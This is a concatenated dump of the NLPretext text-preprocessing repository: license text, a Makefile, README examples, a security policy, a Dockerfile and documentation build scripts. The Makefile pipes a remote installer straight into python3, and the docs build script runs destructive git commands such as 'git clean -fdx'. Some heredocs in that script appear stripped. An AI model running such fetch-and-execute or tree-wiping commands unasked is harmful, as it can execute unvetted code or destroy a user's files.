3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:
(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and
(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and
(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
include a readable copy of the attribution notices contained
within such NOTICE file, excluding those notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work.
To apply the Apache License to your work, attach the following
boilerplate notice, with the fields enclosed by brackets "[]"
replaced with your own identifying information. (Don't include
the brackets!) The text should be enclosed in the appropriate
comment syntax for the file format. We also recommend that a
file or class name and description of purpose be included on the
same "printed page" as the copyright notice for easier
identification within third-party archives.
Copyright [yyyy] [name of copyright owner]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
© 2021 GitHub, Inc.
Terms
Privacy
Security
Status
Docs
Contact GitHub
Pricing
API
Training
Blog
About
================================================
FILE: Makefile
================================================
SHELL := /usr/bin/env bash
IMAGE := nlpretext
VERSION := latest
NO_CHECK_FLAG = || true
ifeq ($(STRICT), 1)
POETRY_COMMAND_FLAG =
PIP_COMMAND_FLAG =
SAFETY_COMMAND_FLAG =
BANDIT_COMMAND_FLAG =
SECRETS_COMMAND_FLAG =
BLACK_COMMAND_FLAG =
DARGLINT_COMMAND_FLAG =
ISORT_COMMAND_FLAG =
MYPY_COMMAND_FLAG =
else
POETRY_COMMAND_FLAG = $(NO_CHECK_FLAG)
PIP_COMMAND_FLAG = $(NO_CHECK_FLAG)
SAFETY_COMMAND_FLAG = $(NO_CHECK_FLAG)
BANDIT_COMMAND_FLAG = $(NO_CHECK_FLAG)
SECRETS_COMMAND_FLAG = $(NO_CHECK_FLAG)
BLACK_COMMAND_FLAG = $(NO_CHECK_FLAG)
DARGLINT_COMMAND_FLAG = $(NO_CHECK_FLAG)
ISORT_COMMAND_FLAG = $(NO_CHECK_FLAG)
MYPY_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
ifeq ($(POETRY_STRICT), 1)
POETRY_COMMAND_FLAG =
else ifeq ($(POETRY_STRICT), 0)
POETRY_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
ifeq ($(PIP_STRICT), 1)
PIP_COMMAND_FLAG =
else ifeq ($(PIP_STRICT), 0)
PIP_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
ifeq ($(SAFETY_STRICT), 1)
SAFETY_COMMAND_FLAG =
else ifeq ($(SAFETY_STRICT), 0)
SAFETY_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
ifeq ($(BANDIT_STRICT), 1)
BANDIT_COMMAND_FLAG =
else ifeq ($(BANDIT_STRICT), 0)
BANDIT_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
ifeq ($(SECRETS_STRICT), 1)
SECRETS_COMMAND_FLAG =
else ifeq ($(SECRETS_STRICT), 0)
SECRETS_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
ifeq ($(BLACK_STRICT), 1)
BLACK_COMMAND_FLAG =
else ifeq ($(BLACK_STRICT), 0)
BLACK_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
ifeq ($(DARGLINT_STRICT), 1)
DARGLINT_COMMAND_FLAG =
else ifeq ($(DARGLINT_STRICT), 0)
DARGLINT_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
ifeq ($(ISORT_STRICT), 1)
ISORT_COMMAND_FLAG =
else ifeq ($(ISORT_STRICT), 0)
ISORT_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
ifeq ($(MYPY_STRICT), 1)
MYPY_COMMAND_FLAG =
else ifeq ($(MYPY_STRICT), 0)
MYPY_COMMAND_FLAG = $(NO_CHECK_FLAG)
endif
.PHONY: download-poetry
download-poetry:
curl -sSL https://install.python-poetry.org | python3 -
.PHONY: install
install:
poetry env use python3.10
poetry lock -n
poetry install -n
ifneq ($(NO_PRE_COMMIT), 1)
poetry run pre-commit install -t pre-commit -t pre-push
endif
.PHONY: check-safety
check-safety:
poetry check$(POETRY_COMMAND_FLAG) && \
poetry run pip check$(PIP_COMMAND_FLAG) && \
poetry run safety check --full-report$(SAFETY_COMMAND_FLAG) && \
poetry run bandit -r nlpretext/$(BANDIT_COMMAND_FLAG)
.PHONY: gitleaks
gitleaks:
commits="$$(git rev-list --ancestry-path $$(git rev-parse $$(git branch -r --sort=committerdate | tail -1))..$$(git rev-parse HEAD))"; \
if [ "$${commits}" != "" ]; then docker run --rm -v $$(pwd):/code/ zricethezav/gitleaks --path=/code/ -v --commits=$$(echo $${commits} | paste -s -d, -)$(SECRETS_COMMAND_FLAG); fi;
.PHONY: format-code
format-code:
poetry run pre-commit run --all
.PHONY: test
test:
poetry run pytest
.PHONY: lint
lint: check-safety format-code test
# Example: make docker VERSION=latest
# Example: make docker IMAGE=some_name VERSION=1.0.4
.PHONY: docker
docker:
@echo Building docker $(IMAGE):$(VERSION) ...
docker build \
-t $(IMAGE):$(VERSION) . \
-f ./docker/Dockerfile
# Example: make clean_docker VERSION=latest
# Example: make clean_docker IMAGE=some_name VERSION=1.0.4
.PHONY: clean_docker
clean_docker:
@echo Removing docker $(IMAGE):$(VERSION) ...
docker rmi -f $(IMAGE):$(VERSION)
.PHONY: clean_build
clean_build:
rm -rf build/
.PHONY: clean
clean: clean_build clean_docker
================================================
FILE: README.md
================================================
# NLPretext
[](https://github.com/artefactory/NLPretext/actions/workflows/ci.yml?query=branch%3Amain)
[](https://github.com/artefactory/NLPretext/actions/workflows/cd.yml?query=event%3Arelease)
[](#supported-python-versions)
[](https://github.com/artefactory/NLPretext}/pulls?utf8=%E2%9C%93&q=is%3Apr%20author%3Aapp%2Fdependabot)
[](https://github.com/psf/black)
[](https://github.com/PyCQA/bandit)
[](https://github.com/artefactory/NLPretext}/blob/main/.pre-commit-config.yaml)
[](https://github.com/artefactory/NLPretext/releases)
[](https://github.com/artefactory/NLPretext}/tree/main/docs)
[](https://github.com/artefactory/NLPretext}/blob/main/LICENSE)
All the goto functions you need to handle NLP use-cases, integrated in NLPretext
# TL;DR
> *Working on an NLP project and tired of always looking for the same silly preprocessing functions on the web?* :tired_face:
> *Need to efficiently extract email adresses from a document? Hashtags from tweets? Remove accents from a French post?* :disappointed_relieved:
**NLPretext got you covered!** :rocket:
NLPretext packages in a **unique** library all the text **preprocessing** functions you need to **ease** your NLP project.
:mag: Quickly explore below our preprocessing pipelines and individual functions referential.
* [Default preprocessing pipeline](#default_pipeline)
* [Custom preprocessing pipeline](#custom_pipeline)
* [Replacing phone numbers](#replace_phone_numbers)
* [Removing hashtags](#remove_hashtags)
* [Extracting emojis](#extract_emojis)
* [Data augmentation](#data_augmentation)
Cannot find what you were looking for? Feel free to open an [issue]((https://github.com/artefactory/nlpretext/issues) ).
# Installation
### Supported Python Versions
- Main version supported : `3.8`
- Other supported versions : `3.9`, `3.10`
We strongly advise you to do the remaining steps in a virtual environnement.
To install this library from PyPi, run the following command:
```bash
pip install nlpretext
```
or with `Poetry`
```bash
poetry add nlpretext
```
# Usage
## Default pipeline
Need to preprocess your text data but no clue about what function to use and in which order? The default preprocessing pipeline got you covered:
```python
from nlpretext import Preprocessor
text = "I just got the best dinner in my life @latourdargent !!! I recommend 😀 #food #paris \n"
preprocessor = Preprocessor()
text = preprocessor.run(text)
print(text)
# "I just got the best dinner in my life!!! I recommend"
```
## Create your custom pipeline
Another possibility is to create your custom pipeline if you know exactly what function to apply on your data, here's an example:
```python
from nlpretext import Preprocessor
from nlpretext.basic.preprocess import (normalize_whitespace, remove_punct, remove_eol_characters,
remove_stopwords, lower_text)
from nlpretext.social.preprocess import remove_mentions, remove_hashtag, remove_emoji
text = "I just got the best dinner in my life @latourdargent !!! I recommend 😀 #food #paris \n"
preprocessor = Preprocessor()
preprocessor.pipe(lower_text)
preprocessor.pipe(remove_mentions)
preprocessor.pipe(remove_hashtag)
preprocessor.pipe(remove_emoji)
preprocessor.pipe(remove_eol_characters)
preprocessor.pipe(remove_stopwords, args={'lang': 'en'})
preprocessor.pipe(remove_punct)
preprocessor.pipe(normalize_whitespace)
text = preprocessor.run(text)
print(text)
# "dinner life recommend"
```
Take a look at all the functions that are available [here](https://github.com/artefactory/NLPretext/tree/master/nlpretext) in the ```preprocess.py``` scripts in the different folders: basic, social, token.
## Load text data
Pre-processing text data is useful only if you have loaded data to process! Importing text data as strings in your code can be really simple if you have short texts contained in a local .txt, but it can quickly become difficult if you want to load a lot of texts, stored in multiple formats and divided in multiple files. Hopefully, you can use NLPretext's TextLoader class to easily import text data.
while it is not mandatory our textLoader work best with dask, make sure to have the librairy installed if you want the best performances.
```python
from nlpretext.textloader import TextLoader
files_path = "local_folder/texts/text.txt"
text_loader = TextLoader(use_dask=True)
text_dataframe = text_loader.read_text(files_path)
print(text_dataframe.text.values.tolist())
# ["I just got the best dinner in my life!!!", "I recommend", "It was awesome"]
```
File path can be provided as string, list of strings, with or without wildcards. It also supports imports from cloud providers, if your machine is authentified on a project.
```python
text_loader = TextLoader(text_column="name_of_text_column_in_your_data")
local_file_path = "local_folder/texts/text.csv" # File from local folder
local_corpus_path = ["local_folder/texts/text_1.csv", "local_folder/texts/text_2.csv", "local_folder/texts/text_3.csv"] # Multiple files from local folder
gcs_file_path = "gs://my-bucket/texts/text.json" # File from GCS
s3_file_path = "s3://my-bucket/texts/text.json" # File from S3
hdfs_file_path = "hdfs://folder/texts/text.txt" # File from HDFS
azure_file_path = "az://my-bucket/texts/text.parquet" # File from Azure
gcs_corpus_path = "gs://my-bucket/texts/text_*.json" # Multiple files from GCS with wildcard
text_dataframe_1 = text_loader.read_text(local_file_path)
text_dataframe_2 = text_loader.read_text(local_corpus_path)
text_dataframe_3 = text_loader.read_text(gcs_file_path)
text_dataframe_4 = text_loader.read_text(s3_file_path)
text_dataframe_5 = text_loader.read_text(hdfs_file_path)
text_dataframe_6 = text_loader.read_text(azure_file_path)
text_dataframe_7 = text_loader.read_text(gcs_corpus_path)
```
You can also specify a Preprocessor if you want your data to be directly pre-processed when loaded.
```python
text_loader = TextLoader(text_column="text_col")
preprocessor = Preprocessor()
file_path = "local_folder/texts/text.csv" # File from local folder
raw_text_dataframe = text_loader.read_text(local_file_path)
preprocessed_text_dataframe = text_loader.read_text(local_file_path, preprocessor=preprocessor)
print(raw_text_dataframe.text_col.values.tolist())
# ["These texts are not preprocessed", "This is bad ## "]
print(preprocessed_text_dataframe.text_col.values.tolist())
# ["These texts are not preprocessed", "This is bad"]
```
## Individual Functions
### Replacing emails
```python
from nlpretext.basic.preprocess import replace_emails
example = "I have forwarded this email to obama@whitehouse.gov"
example = replace_emails(example, replace_with="*EMAIL*")
print(example)
# "I have forwarded this email to *EMAIL*"
```
### Replacing phone numbers
```python
from nlpretext.basic.preprocess import replace_phone_numbers
example = "My phone number is 0606060606"
example = replace_phone_numbers(example, country_to_detect=["FR"], replace_with="*PHONE*")
print(example)
# "My phone number is *PHONE*"
```
### Removing Hashtags
```python
from nlpretext.social.preprocess import remove_hashtag
example = "This restaurant was amazing #food #foodie #foodstagram #dinner"
example = remove_hashtag(example)
print(example)
# "This restaurant was amazing"
```
### Extracting emojis
```python
from nlpretext.social.preprocess import extract_emojis
example = "I take care of my skin 😀"
example = extract_emojis(example)
print(example)
# [':grinning_face:']
```
## Data augmentation
The augmentation module helps you to **generate new texts** based on your given examples by modifying some words in the initial ones and to **keep associated entities unchanged**, if any, in the case of **NER tasks**. If you want words other than entities to remain unchanged, you can specify it within the `stopwords` argument. Modifications depend on the chosen method, the ones currently supported by the module are **substitutions with synonyms** using Wordnet or BERT from the [`nlpaug`](https://github.com/makcedward/nlpaug) library.
```python
from nlpretext.augmentation.text_augmentation import augment_text
example = "I want to buy a small black handbag please."
entities = [{'entity': 'Color', 'word': 'black', 'startCharIndex': 22, 'endCharIndex': 27}]
example = augment_text(example, method=”wordnet_synonym”, entities=entities)
print(example)
# "I need to buy a small black pocketbook please."
```
# 📈 Releases
You can see the list of available releases on the [GitHub Releases](https://github.com/artefactory/NLPretext}/releases) page.
We follow [Semantic Versions](https://semver.org/) specification.
We use [`Release Drafter`](https://github.com/marketplace/actions/release-drafter). As pull requests are merged, a draft release is kept up-to-date listing the changes, ready to publish when you’re ready. With the categories option, you can categorize pull requests in release notes using labels.
For Pull Requests, these labels are configured, by default:
| **Label** | **Title in Releases** |
| :-----------------------------------: | :---------------------: |
| `enhancement`, `feature` | 🚀 Features |
| `bug`, `refactoring`, `bugfix`, `fix` | 🔧 Fixes & Refactoring |
| `build`, `ci`, `testing` | 📦 Build System & CI/CD |
| `breaking` | 💥 Breaking Changes |
| `documentation` | 📝 Documentation |
| `dependencies` | ⬆️ Dependencies updates |
GitHub creates the `bug`, `enhancement`, and `documentation` labels automatically. Dependabot creates the `dependencies` label. Create the remaining labels on the Issues tab of the GitHub repository, when needed.## 🛡 License
[](https://github.com/artefactory/NLPretext}/blob/main/LICENSE)
This project is licensed under the terms of the `Apache Software License 2.0` license. See [LICENSE](https://github.com/artefactory/NLPretext}/blob/main/LICENSE) for more details.## 📃 Citation
```
@misc{nlpretext,
author = {artefactory},
title = {All the goto functions you need to handle NLP use-cases, integrated in NLPretext},
year = {2021},
publisher = {GitHub},
journal = {GitHub repository},
howpublished = {\url{https://github.com/artefactory/NLPretext}}}
}
```
# Project Organization
------------
.
├── .github/workflows <- Where the CI and CD lives
├── datasets/external <- Bash scripts to download external datasets
├── docker <- All you need to build a Docker image from that package
├── docs <- Sphinx HTML documentation
├── nlpretext <- Main Package. This is where the code lives
│ ├── preprocessor.py <- Main preprocessing script
│ ├── text_loader.py <- Main loading script
│ ├── augmentation <- Text augmentation script
│ ├── basic <- Basic text preprocessing
│ ├── cli <- Command lines that can be used
│ ├── social <- Social text preprocessing
│ ├── token <- Token text preprocessing
│ ├── textloader <- File loading
│ ├── _config <- Where the configuration and constants live
│ └── _utils <- Where preprocessing utils scripts lives
├── references <- assets
├── tests <- Where the tests lives
├── .gitignore
├── .pre-commit-config.yaml <- Pre-commit configuration
├── CODE_OF_CONDUCT.md <- Code of conduct guidelines
├── CONTRIBUTING.md <- Contribution guidelines
├── LICENSE
├── Makefile
├── pyproject.toml <- Package build configuration
├── README.md <- The top-level README for developers using this project.
└── SECURITY.md
# Credits
- [textacy](https://github.com/chartbeat-labs/textacy) for the following basic preprocessing functions:
- `fix_bad_unicode`
- `normalize_whitespace`
- `unpack_english_contractions`
- `replace_urls`
- `replace_emails`
- `replace_numbers`
- `replace_currency_symbols`
- `remove_punct`
- `remove_accents`
- `replace_phone_numbers` *(with some modifications of our own)*
================================================
FILE: SECURITY.md
================================================
# Security
## 🔐 Reporting Security Issues
> Do not open issues that might have security implications!
> It is critical that security related issues are reported privately so we have time to address them before they become public knowledge.
Vulnerabilities can be reported by emailing core members:
- artefactory [jules.bertrand@artefact.com](mailto:jules.bertrand@artefact.com)
Please include the requested information listed below (as much as you can provide) to help us better understand the nature and scope of the possible issue:
- Type of issue (e.g. buffer overflow, SQL injection, cross-site scripting, etc.)
- Full paths of source file(s) related to the manifestation of the issue
- The location of the affected source code (tag/branch/commit or direct URL)
- Any special configuration required to reproduce the issue
- Environment (e.g. Linux / Windows / macOS)
- Step-by-step instructions to reproduce the issue
- Proof-of-concept or exploit code (if possible)
- Impact of the issue, including how an attacker might exploit the issue
This information will help us triage your report more quickly.
## Preferred Languages
We prefer all communications to be in English.
================================================
FILE: datasets/external/get_language_dataset.sh
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#!/bin/bash
wget -O wili.zip https://zenodo.org/record/841984/files/wili-2018.zip?download=1
mkdir -p wili && cp wili.zip wili && cd wili && unzip wili.zip && cd ..
================================================
FILE: datasets/external/get_stanfordtweets.sh
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#!/bin/bash
wget -O trainingandtestdata.zip http://cs.stanford.edu/people/alecmgo/trainingandtestdata.zip trainingandtestdata.zip
mkdir -p tweets_sentiment && cp trainingandtestdata.zip tweets_sentiment && cd tweets_sentiment && unzip trainingandtestdata.zip
================================================
FILE: docker/Dockerfile
================================================
FROM python:3.10-slim-buster
ENV LANG=C.UTF-8 \
LC_ALL=C.UTF-8
RUN apt-get update && \
apt-get install -y --no-install-recommends \
curl coreutils \
&& rm -rf /var/lib/apt/lists/*
# Install Poetry
ENV POETRY_VERSION=1.5.1
RUN pip install --upgrade pip
RUN python3 -m pip install "poetry==$POETRY_VERSION"
WORKDIR /home/workspace
COPY pyproject.toml ./
RUN poetry config virtualenvs.create false \
&& poetry lock \
&& poetry install --no-root --no-dev --no-interaction
COPY . /home/docker_user/workspace/
ENTRYPOINT ["poetry", "run", "nlpretext"]
================================================
FILE: docker/README.md
================================================
# Docker for nlpretext
## Installation
To create Docker you need to run:
```bash
make docker
```
which is equivalent to:
```bash
make docker VERSION=latest
```
You could also provide name and version for the image itself.
Default name is `IMAGE := nlpretext`.
Default version is `VERSION := latest`.
```bash
make docker IMAGE=some_name VERSION=1.0.4
```
## Usage
```bash
docker run -it --rm \
-v $(pwd):/workspace \
nlpretext bash
```
## How to clean up
To uninstall docker image run `make clean_docker` with `VERSION`:
```bash
make clean_docker VERSION=1.0.4
```
like in installation, you can also choose the image name
```bash
make clean_docker IMAGE=some_name VERSION=latest
```
If you want to clean all, including `build` run `make clean`
================================================
FILE: docs/Makefile
================================================
# Minimal makefile for Sphinx documentation
#
# You can set these variables from the command line, and also
# from the environment for the first two.
SPHINXOPTS ?=
SPHINXBUILD ?= poetry run sphinx-build
SPHINXAPIBUILD ?= poetry run sphinx-apidoc
SPHINXMULTIVERSION ?= poetry run sphinx-multiversion
SOURCEDIR = source
BUILDDIR = build
# Put it first so that "make" without argument is like "make help".
.PHONY: help Makefile
help:
@$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
multiversion:
@$(SPHINXMULTIVERSION) $(SOURCEDIR) $(BUILDDIR)/html
apidoc:
@$(SPHINXAPIBUILD) -f -o source/apidoc/ ../nlpretext/ --implicit-namespaces -M -t source/_templates
# Catch-all target: route all unknown targets to Sphinx using the new
# "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS).
%: Makefile
@$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
================================================
FILE: docs/make.bat
================================================
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% .
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
)
if "%1" == "" goto help
if "%1" == "help" (
:help
echo.Please use `make ^` where ^ is one of
echo. html to make standalone HTML files
echo. dirhtml to make HTML files named index.html in directories
echo. singlehtml to make a single large HTML file
echo. pickle to make pickle files
echo. json to make JSON files
echo. htmlhelp to make HTML files and a HTML help project
echo. qthelp to make HTML files and a qthelp project
echo. devhelp to make HTML files and a Devhelp project
echo. epub to make an epub
echo. latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter
echo. text to make text files
echo. man to make manual pages
echo. changes to make an overview over all changed/added/deprecated items
echo. linkcheck to check all external links for integrity
echo. doctest to run all doctests embedded in the documentation if enabled
goto end
)
if "%1" == "clean" (
for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i
del /q /s %BUILDDIR%\*
goto end
)
if "%1" == "html" (
%SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/html.
goto end
)
if "%1" == "dirhtml" (
%SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml.
goto end
)
if "%1" == "singlehtml" (
%SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml.
goto end
)
if "%1" == "pickle" (
%SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle
echo.
echo.Build finished; now you can process the pickle files.
goto end
)
if "%1" == "json" (
%SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json
echo.
echo.Build finished; now you can process the JSON files.
goto end
)
if "%1" == "htmlhelp" (
%SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp
echo.
echo.Build finished; now you can run HTML Help Workshop with the ^
.hhp project file in %BUILDDIR%/htmlhelp.
goto end
)
if "%1" == "qthelp" (
%SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp
echo.
echo.Build finished; now you can run "qcollectiongenerator" with the ^
.qhcp project file in %BUILDDIR%/qthelp, like this:
echo.^> qcollectiongenerator %BUILDDIR%\qthelp\Mapnik.qhcp
echo.To view the help file:
echo.^> assistant -collectionFile %BUILDDIR%\qthelp\Mapnik.ghc
goto end
)
if "%1" == "devhelp" (
%SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp
echo.
echo.Build finished.
goto end
)
if "%1" == "epub" (
%SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub
echo.
echo.Build finished. The epub file is in %BUILDDIR%/epub.
goto end
)
if "%1" == "latex" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
echo.
echo.Build finished; the LaTeX files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "text" (
%SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text
echo.
echo.Build finished. The text files are in %BUILDDIR%/text.
goto end
)
if "%1" == "man" (
%SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man
echo.
echo.Build finished. The manual pages are in %BUILDDIR%/man.
goto end
)
if "%1" == "changes" (
%SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes
echo.
echo.The overview file is in %BUILDDIR%/changes.
goto end
)
if "%1" == "linkcheck" (
%SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck
echo.
echo.Link check complete; look for any errors in the above output ^
or in %BUILDDIR%/linkcheck/output.txt.
goto end
)
if "%1" == "doctest" (
%SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest
echo.
echo.Testing of doctests in the sources finished, look at the ^
results in %BUILDDIR%/doctest/output.txt.
goto end
)
:end
================================================
FILE: docs/scripts/buildsite.sh
================================================
#!/bin/bash
export SOURCE_DATE_EPOCH=$(git log -1 --pretty=%ct)
##############
# BUILD DOCS #
##############
# Python Sphinx, configured with source/conf.py
# See https://www.sphinx-doc.org/
cd docs/
current_tag=$(git symbolic-ref -q --short HEAD || git describe --tags --exact-match)
current_tag_message=$(git cat-file -p $(git rev-parse $(git tag -l | tail -n1)) | tail -n +6)
make clean
make apidoc
git add .
git commit -m "Commit needed for multiversioning"
git pull --tags
git tag -a latest -m "Latest version of the package"
make multiversion
#######################
# Update GitHub Pages #
#######################
docroot=`mktemp -d`
cp -r build/html/* ${docroot}
cd ..
git branch -d gh-pages
git checkout --orphan gh-pages
git rm --cached -r .
git clean -fdx
# Adds .nojekyll file to the root to signal to GitHub that
# directories that start with an underscore (_) can remain
touch .nojekyll
# Add index.html
cat > index.html <
Redirecting to the latest release
EOF
# Add README
cat > README.md <
Other Versions
v: {{ current_version.name }}
{%- if versions.tags %}
Tags
{%- for item in versions.tags %}
{{ item.name }}
{%- endfor %}
{%- endif %}
{%- if versions.branches %}
Branches
{%- for item in versions.branches %}
{{ item.name }}
{%- endfor %}
{%- endif %}
{%- endif %}
================================================
FILE: docs/source/conf.py
================================================
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath(".."))
# -- Project information -----------------------------------------------------
project = "nlpretext"
author = "artefactory"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.intersphinx",
"sphinx.ext.mathjax",
"sphinx.ext.napoleon",
"sphinx.ext.todo",
"sphinx.ext.viewcode",
"recommonmark",
"nbsphinx",
"sphinx_multiversion",
"sphinx_autodoc_typehints",
"sphinx_rtd_theme",
]
source_suffix = {
".rst": "restructuredtext",
".txt": "restructuredtext",
".md": "markdown",
}
source_parsers = {".md": "recommonmark.parser.CommonMarkParser"}
nbsphinx_execute = "never"
github_url = "https://github.com/artefactory/NLPretext"
